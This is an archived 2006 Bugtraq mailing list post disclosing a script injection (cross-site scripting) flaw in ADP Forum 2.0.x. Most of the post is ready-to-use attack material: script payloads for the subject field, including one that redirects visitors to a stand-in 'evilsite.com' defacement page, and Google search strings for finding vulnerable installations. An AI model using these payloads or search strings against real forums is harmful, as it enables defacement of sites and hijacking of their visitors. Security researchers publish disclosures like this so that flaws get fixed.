Bugtraq mailing list archives
ADP Forum 2.0,* script İnjection
From: liz0 () bsdmail com
Date: 9 Mar 2006 14:21:15 -0000
ADP Forum 2.0,* script İnjection ---------------------------------------------------- site:http://www.linux.it/~fedro/ demo:http://www.adp.host.sk/Forum203/ -------------------------------------------------- Post This Code: <script>alert(/Liz0ziM/)</script> <script>location.href="http://evilsite.com/deface.html";</script> vs.. --------------------------------------------------------- Example Post Message : Name :Liz0ziM Username :username Password :password E-mail :liz0 () bsdmail com Subject :<script>location.href="http://evilsite.com/deface.html";</script> Message :LOL :=) --------------------------------------------------------- Credit:Liz0ziM Mail :liz0 () bsdmail com Site :www.biyosecurity.com BiyoSecurityTeam: Liz0ziM,Codexploder'tq,r00t3rr0r,y3LL0w ------------------------------------------------------------ google: "ADP Forum 2.0.3 is powered by VzScripts" "ADP Forum 2.0.2" "ADP Forum 2.0.1" "ADP Forum 2.0" ------------------------------------------------------------ Source: http://www.blogcu.com/Liz0ziM/338614/ http://biyosecurity.be/bugs/adpforum2.html http://biyosecurity.be/bugs/adpforum2.txt
Current thread:
- ADP Forum 2.0,* script İnjection liz0 (Mar 09)